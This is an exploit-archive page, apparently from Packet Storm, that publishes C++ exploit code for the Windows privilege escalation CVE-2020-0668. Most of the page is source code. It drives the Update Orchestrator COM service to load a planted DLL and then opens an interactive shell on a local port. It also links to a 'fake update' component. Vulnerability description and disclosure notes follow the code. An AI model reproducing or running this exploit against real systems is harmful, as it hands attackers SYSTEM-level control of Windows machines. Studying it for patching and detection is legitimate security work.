what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Windows Kernel Privilege Escalation

Microsoft Windows Kernel Privilege Escalation
Posted Feb 28, 2020
Authored by nu11secur1ty

This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Tracing functionality used by the Routing and Remote Access service. The issue results from the lack of proper permissions on registry keys that control this functionality. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of SYSTEM.

tags | exploit, remote, local, registry
systems | windows
advisories | CVE-2020-0668
SHA-256 | 6b0526f98f3e203e2ed6be699de4fcc715f41c3ab7e148e28ed2e62563a77a96

Microsoft Windows Kernel Privilege Escalation

Change Mirror Download
# Exploit Title: Windows Kernel Elevation of Privilege Vulnerability +
PWN-OS-FAKE UPDATE Windows 10 - Local
# Author: nu11secur1ty
# Date: 2020-02-27
# Vendor: Microsoft
# Link:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0668
# CVE: 2020-0668


[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source:
https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0668
[+] twitter.com/nu11secur1ty


[Exploit Program Code]
# 2020-0668-WKEPV

- - 2020-0668-WKEPV.cpp

#include <iostream>
#include "MiniUsoClient.h"
#include "TcpClient.h"

#define TEMPO 2000

int wmain(int argc, wchar_t** argv)
{
TcpClient tcpClient;
int iRes = 0;

// Try to trigger DLL loading with 'StartScan'
wprintf_s(L"[*] Using UpdateOrchestrator->StartScan()\n");
MiniUsoClient miniUsoClient;
if (!miniUsoClient.Run(USO_STARTSCAN))
return 1;


//wprintf_s(L"[*] Waiting for the DLL to be loaded...\n");
Sleep(TEMPO);

iRes = tcpClient.connectTCP("127.0.0.1", "1337");

if (iRes != 0)
{
wprintf_s(L"[*] Retrying with
UpdateOrchestrator->StartInteractiveScan()\n");
if (!miniUsoClient.Run(USO_STARTINTERACTIVESCAN))
return 2;

Sleep(TEMPO);

iRes = tcpClient.connectTCP("127.0.0.1", "1337");
}

if (iRes != 0)
{
wprintf_s(L"[*] Retrying with UpdateOrchestrator->StartDownload()\n");
if (!miniUsoClient.Run(USO_STARTDOWNLOAD))
return 3;

Sleep(TEMPO);

iRes = tcpClient.connectTCP("127.0.0.1", "1337");
}

if (iRes != 0)
{
wprintf_s(L"[-] Exploit failed.");
}
else
{
wprintf_s(L"[+] Exploit successfull @nu11secur1ty");
}

return 0;
}


-----------------------------------------------------------------
- - MiniUsoClient.cpp

#include "MiniUsoClient.h"
#pragma comment(lib, "rpcrt4.lib")

MiniUsoClient::MiniUsoClient()
{
HRESULT hResult;

hResult = CoInitializeEx(0, COINIT_MULTITHREADED);
if (FAILED(hResult))
{
wprintf_s(L" |__ CoInitializeEx() failed. Error code = 0x%08X\n",
hResult);
_ready = false;
}
else
{
_ready = true;
}
}

MiniUsoClient::~MiniUsoClient()
{
CoUninitialize();
}

void MiniUsoClient::ThrowOnError(HRESULT hResult)
{
if (hResult != 0)
{
throw _com_error(hResult);
}
}

bool MiniUsoClient::Run(UsoAction action)
{
HRESULT hResult;

if (this->_ready)
{
wprintf_s(L" |__ Creating instance of 'UpdateSessionOrchestrator'... ");

GUID CLSID_UpdateSessionOrchestrator = { 0xb91d5831, 0xb1bd, 0x4608, {
0x81, 0x98, 0xd7, 0x2e, 0x15, 0x50, 0x20, 0xf7 } };
IUpdateSessionOrchestratorPtr updateSessionOrchestrator;
hResult = CoCreateInstance(CLSID_UpdateSessionOrchestrator, nullptr,
CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&updateSessionOrchestrator));
if (FAILED(hResult))
{
wprintf_s(L"\n |__ CoCreateInstance() failed. Error code = 0x%08X\n",
hResult);
CoUninitialize();
return false;
}

wprintf_s(L"Done.\n");


IUsoSessionCommonPtr usoSessionCommon;
GUID IID_IUsoSessionCommon = { 0xfccc288d, 0xb47e, 0x41fa, { 0x97, 0x0c,
0x93, 0x5e, 0xc9, 0x52, 0xf4, 0xa4 } };
try
{
wprintf_s(L" |__ Creating a new Update Session... ");
updateSessionOrchestrator->CreateUpdateSession(1, &IID_IUsoSessionCommon,
&usoSessionCommon);
wprintf_s(L"Done.\n");

//wprintf_s(L" |__ Calling 'CoSetProxyBlanket()'... ");
ThrowOnError(CoSetProxyBlanket(usoSessionCommon, RPC_C_AUTHN_DEFAULT,
RPC_C_AUTHZ_DEFAULT, COLE_DEFAULT_PRINCIPAL, RPC_C_AUTHN_LEVEL_DEFAULT,
RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, NULL));
//wprintf_s(L"Done.\n");

switch (action)
{
case USO_STARTSCAN:
wprintf(L" |__ Calling 'StartScan'... ");
ThrowOnError(usoSessionCommon->Proc21(0, 0, L"ScanTriggerUsoClient"));
wprintf(L"Done.\n");
break;
case USO_STARTDOWNLOAD:
wprintf(L" |__ Calling 'StartDownload'... ");
ThrowOnError(usoSessionCommon->Proc22(0));
wprintf(L"Done.\n");
break;
case USO_STARTINTERACTIVESCAN:
wprintf(L" |__ Calling 'StartInteractiveScan'... ");
ThrowOnError(usoSessionCommon->Proc21(0xffffffff, 0,
L"ScanTriggerUsoClientInteractive"));
wprintf(L"Done.\n");
break;
}

}
catch (const _com_error& error)
{
wprintf_s(L"\n |__ Something went wrong (%08X - \"%ls\").\n",
error.Error(), error.ErrorMessage());
return false;
}
}
else
{
return false;
}

return true;
}


-------------------------------------------------------------------
- - TcpClient.cpp

#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdlib.h>
#include <stdio.h>
#include <iostream>

#include "TcpClient.h"

#pragma comment (lib, "Ws2_32.lib")
#pragma comment (lib, "Mswsock.lib")
#pragma comment (lib, "AdvApi32.lib")

TcpClient::TcpClient(){}

TcpClient::~TcpClient()
{
WSACleanup();
}

int TcpClient::connectTCP(const char* hostname, const char* port)
{
WSADATA wsaData;
SOCKET socketClient = INVALID_SOCKET;
struct addrinfo* result = NULL, * ptr = NULL, hints;
int iResult = 0;
//int recvbuflen = BUFSIZE;
DWORD dwThreadIdOut;
DWORD dwThreadIdIn;
HANDLE hThreadOut;
HANDLE hThreadIn;

// Initialize Winsock
iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
if (iResult != 0) {
wprintf_s(L"WSAStartup failed with error: %d\n", iResult);
return 1;
}

ZeroMemory(&hints, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;

// Resolve the server address and port
iResult = getaddrinfo(hostname, port, &hints, &result);
if (iResult != 0) {
wprintf_s(L"getaddrinfo failed with error: %d\n", iResult);
WSACleanup();
return 1;
}

// Attempt to connect to an address until one succeeds
for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {

// Create a SOCKET for connecting to server
socketClient = socket(ptr->ai_family, ptr->ai_socktype,
ptr->ai_protocol);
if (socketClient == INVALID_SOCKET) {
wprintf_s(L"socket failed with error: %ld\n", WSAGetLastError());
WSACleanup();
return 1;
}

// Connect to server.
iResult = connect(socketClient, ptr->ai_addr, (int)ptr->ai_addrlen);
if (iResult == SOCKET_ERROR) {
closesocket(socketClient);
socketClient = INVALID_SOCKET;
continue;
}
break;
}

freeaddrinfo(result);

if (socketClient == INVALID_SOCKET) {
wprintf_s(L"[-] Unable to connect to server!\n");
WSACleanup();
return 1;
}

// Create a thread to receive data from the socket in an infinite loop
hThreadOut = CreateThread(NULL, 0, ReceiveDataFromSocket,
(LPVOID)socketClient, 0, &dwThreadIdOut);
if (hThreadOut == NULL)
{
wprintf_s(L"[-] Create thread failed: ReceiveDataFromSocket\n");
return -1;
}

// Create a thread to read user input in an infinite loop
hThreadIn = CreateThread(NULL, 0, SendDataFromConsole,
(LPVOID)socketClient, 0, &dwThreadIdIn);
if (hThreadIn == NULL)
{
wprintf_s(L"[-] Create thread failed: SendDataFromConsole\n");
return -1;
}

wprintf_s(L"[+] Spawning shell...\n");

// Wait for the socket to be closed
WaitForSingleObject(hThreadOut, INFINITE);

// shutdown the connection since no more data will be sent
iResult = shutdown(socketClient, SD_SEND);
if (iResult == SOCKET_ERROR) {
wprintf_s(L"shutdown failed with error: %d\n", WSAGetLastError());
closesocket(socketClient);
WSACleanup();
return 1;
}

// cleanup
CloseHandle(hThreadIn);
CloseHandle(hThreadOut);
closesocket(socketClient);
WSACleanup();

return 0;
}

DWORD WINAPI TcpClient::ReceiveDataFromSocket(LPVOID lpvParam)
{
int iResult;
SOCKET socketClient = (SOCKET)lpvParam;
char bufReceive[BUFSIZE];

while (true)
{
ZeroMemory(bufReceive, BUFSIZE);
iResult = recv(socketClient, bufReceive, BUFSIZE, 0);
if (iResult > 0)
{
printf("%s", bufReceive);
}
else
break;
}
return 0;
}

DWORD WINAPI TcpClient::SendDataFromConsole(LPVOID lpvParam)
{
HANDLE hStdin;
BOOL bSuccess = FALSE;
DWORD dwRead = 0;
SOCKET socketClient = (SOCKET)lpvParam;
int iResult = 0;
char bufCmd[BUFSIZE];
char* pCr = { 0 };
char* pLf = { 0 };

// Get a handle on standard input
hStdin = GetStdHandle(STD_INPUT_HANDLE);
if (hStdin == INVALID_HANDLE_VALUE)
return 1;

while (true)
{
bSuccess = ReadFile(hStdin, bufCmd, BUFSIZE, &dwRead, NULL);
if (bSuccess == FALSE)
break;

pCr = strchr(bufCmd, '\r');
if (pCr != NULL)
{
pLf = strchr(bufCmd, '\n');
if (pLf != NULL)
{
pCr[0] = '\n';
pLf[0] = 0;
}
}

iResult = send(socketClient, bufCmd, (int)strlen(bufCmd), 0);
if (iResult == SOCKET_ERROR) {
printf("send failed with error: %d\n", WSAGetLastError());
break;
}
}
return 0;
}


- - PWN-OS-FAKE-UPDATE

[link]
https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0668/PWN-Fake-UPDATE-WIN10/Microupdate

#######################################################################

[Vendor]
Microsoft


[Vulnerability Type]
Windows Kernel Elevation of Privilege Vulnerability

[CVE Reference]
An elevation of privilege vulnerability exists in the way that the Windows
Kernel handles objects in memory.
An attacker who successfully exploited the vulnerability could execute code
with elevated permissions.
To exploit the vulnerability, a locally authenticated attacker could run a
specially crafted application.
The security update addresses the vulnerability by ensuring the Windows
Kernel properly handles objects in memory.

[Security Issue]
This vulnerability allows local attackers to escalate privileges on
affected installations of Microsoft Windows.
An attacker must first obtain the ability to execute low-privileged code on
the target system in order to exploit this vulnerability.
The specific flaw exists within the Tracing functionality used by the
Routing and Remote Access service.
The issue results from the lack of proper permissions on registry keys that
control this functionality.
An attacker can leverage this vulnerability to escalate privileges and
execute code in the context of SYSTEM.


[Network Access]
Local


[Video]
https://www.youtube.com/watch?v=ml2feXa6cCY


[Disclosure Timeline]
Published: 02/11/2020


[Conclusion]
The building of a new module for restricting and checking a malicious
execution code from any local user on the machine.
For example, please see:
https://github.com/nu11secur1ty/insmod_block


@nu11secur1ty
https://www.nu11secur1ty.com/

BR

--

hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.blogspot.com/>
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    11 Files
  • 8
    Dec 8th
    36 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close